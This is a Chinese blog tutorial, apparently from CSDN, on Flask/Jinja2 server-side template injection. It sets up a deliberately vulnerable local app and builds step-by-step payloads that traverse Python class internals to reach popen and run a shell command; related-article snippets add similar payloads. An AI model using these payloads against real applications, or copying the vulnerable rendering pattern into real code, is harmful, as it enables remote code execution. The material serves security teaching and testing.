flask ssti 模板注入

于 2024-04-19 11:15:00 发布
阅读量256 收藏 8
点赞数 5
文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/137880605
版权
0x01:flask是基于python开发的一个轻量级web应用,可以用来搭建web环境。

安装flask框架命令:

pip install flask
0x02:漏洞环境代码分析:

render_template_string3.py(这里是我自己给测试文件的命名):

from flask import Flask,render_template_string, request

app=Flask(__name__)

<span>@app.route('/test')#CTL{n}def</span> test():
    code = request.args.get('id')
    html = '''
        <h3>%s</h3>
    '''%(code)
    return render_template_string(html)

if __name__ =='__main__':
    app.run()

没有接触过flask框架的小伙伴看到可能会有点懵,简单分析一下,运行这个py文件就会启动web服务,默认在本机的5000端口,<span>@app.route(‘/test’)?</span>??作用是找路由,这里是http://127.0.0.1:5000/test路径。code = request.args.get(‘id’)的意思是把get传参过来的id字段赋值给变量code。

最核心的地方就是rendet_template_string()函数,这个可以渲染前端输出,这里是把code的值在前端格式化输出了。

html = '''
        <h3>%s</h3>
    '''%(code)
    return render_template_string(html)
0x03:接下来需要了解一个知识点,flask使用的是jinja2的渲染方法,渲染的时候{{}}可以解析包含的内容。如:
from flask import Flask,render_template_string, request

app=Flask(__name__)

<span>@app.route('/aaaaa')#CTL{n}def</span> index():
    content = request.args.get("content")
    return render_template_string(content)


if __name__ =='__main__':
    app.run()

访问http://127.0.0.1:5000/aaaaa?content=1,页面会显示1

访问http://127.0.0.1:5000/aaaaa?content={{2*2}},页面会显示4

很明显,这里的传参被执行了,说明我们可以进行注入了。

0x04:实行文件读写和命令执行的基本操作:获取基本类->获取基本类的子类->在子类中找到关于命令执行和文件读写的模块

在python中,object类是Python中所有类的基类,如果定义一个类时没有指定继承哪个类,则默认继承object类。我们从这段话出发,假定你已经知道ssti漏洞了,但是完全没学过ssti代码怎么写,接下来你可能会学到一点废话。

"".__class__ 意思是空字符串的基类,是str
"".__class__.__mro__  mro给出了method resolution order,即解析方法调用的顺序,可以得到object类
"".__class__.__bases__[0].__subclasses__()  subclasses是返回该类的所有子类的集合
举个例子,我们想要命令执行,就需要找到os函数,Ctrl+F找到了,再__init__.__globals__,这里init初始化类,然后globals全局来查找所有的方法及变量及参数。

到这里poc为

http://127.0.0.1:5000/test?id={{%27%27.__class__.__mro__[1].__subclasses__()[134].__init__.__globals__}}

图片

此时我们可以在网页上看到各种各样的参数方法函数。我们找其中一个可利用的function popen,在python2中可找file读取文件,很多可利用方法,详情可百度了解下。

最终poc为:

http://127.0.0.1:5000/test?id={{%27%27.__class__.__mro__[1].__subclasses__()[134].__init__.__globals__[%27popen%27](%27dir%27).read()}}

图片

这里我们执行了dir命令,得到了回显。

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

渗透测试老鸟-九青
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF_Web:从0学习Flask模板注入SSTI
AFCC_的博客(Web_Dog)
08-30 3723
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
关于flaskSSTI注入
Kr的博客
01-21 7140
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
SSTIflask 模板注入最详解
weixin_53146913的博客
05-10 2041
一、flask是用python编写的一个轻量web开发框架。 二、flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入。 三、flask基础知识: 1. __class__: 返回当前类(有字符串类,元组类,字典组等等) 所有的子类都有一个共同的父类object,如果没指定继承,默认父类是object 2. __mor__: 返回解析函数时,类的调用顺序,先调用str类,再调用object类,通过索引的方式__
PythonFlask模板注入从0到1
Elite的博客
04-27 1791
flask是目前python主流的一个web微框架,通过flask框架我们可以利用python语言搭建起web服务
flask模板注入(ssti),一篇就够了
热门推荐
qq_59950255的博客
03-02 1万+
1.什么是flask? flask是用python编写的一个轻量web开发框架 2.ssti成因 flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入 本地演示(需要自行安装flask,requests模块) 通过输入参数key可以进行简单的渲染,创造新的网页 当我们把render_template 换成render_template_string后,并对参数不进行处理 看看结果 代码执.
flask模板注入
qq_44418229的博客
06-08 1829
python,flask模板注入
SSTI模板注入
0verWatch的博客
02-08 1万+
先入个门 Jimja2 Jinja2是默认的仿Django模板的一个模板引擎,由Flask的作者开发。网上搜的语法2333,方便自己回顾 模板 {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% ... %}:装载一个控制语句。 {# ... #}:装载一个注释,模板渲染的时候会忽视这中间的值 变量 在模板中添加变量,可以使用(set)语句。 ...
fenjing工具ssti
最新发布
12-17
标题中的“fenjing工具ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
tplmap.zip
07-26
模板注入通常发生在应用使用模板引擎解析用户输入时,没有对输入数据进行充分的验证和过滤。这些模板引擎如Jinja2、Smarty、FreeMarker等,在处理动态内容时,如果直接将未经处理的用户输入嵌入到模板中,就可能导致...
Flask SSTI/沙箱逃逸的一些总结
01-20
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ​ 沙箱在早期主要用于测试可疑软件、病毒危害程度等。在沙箱中运行,即使病毒对其造成严重危害,也不会威胁到真实环境。类似于虚拟机的利用。 内建函数 ​ 当启动python解释器时,即使没有创建任何变量或函数,还是会有很多函数可供使用,这些就是python的内建函数。 名称空间:从名称到对象的映射 1.内建名称空间:python自带名字,在解释器启动时产生,存放一些pytho
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
模板注入与_FLASK.pdf
01-02
**模板注入(SSTI)详解** 模板注入,全称为Server Side Template Injection,是一种常见的Web应用程序安全漏洞,它允许攻击者将恶意输入作为模板字符串的一部分,从而在服务端的模板引擎解析时执行函数调用或命令,...
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
1. **Detect**(检测):识别可能存在的模板注入漏洞,通过分析应用程序的输入和输出模式来发现不安全的用户输入处理。 2. **Identify**(识别):确定模板引擎类型和版本,这对于了解可能的exploit和潜在的漏洞至关...
SSTI
03-09
利用SSTI则需要对目标应用的模板引擎有深入理解,构建有效的注入payload。例如,针对Jinja2模板引擎,攻击者可能尝试`{{ __import__('os').system('ls') }}`这样的payload来执行系统命令。 ### 常见的SSTI攻击场景 ...
CTF之路:关于Flask模板注入
zw05011的博客
01-07 5771
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入
SSTI模板注入学习笔记---Flask
willing-sir的博客
04-03 154
SSTI模板注入Flask 这里主要介绍Flask模板下实现模板注入,以及利用简单python语法实现本地SSTI靶场的快速搭建,意在形成基本的利用模板注入漏洞思维。后续会整理其他模板下的注入利用方式。 SSTI Server Side Template Inject 服务器模板注入 Flask前置知识 Flask框架基础 Flask是一种使用 Python 编写的轻量级 Web 应用框架,最...
flask模板注入入门
Enrobot的博客
12-24 191
flask模板注入入门从零学习flask模板注入 - FreeBuf网络安全行业门户
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值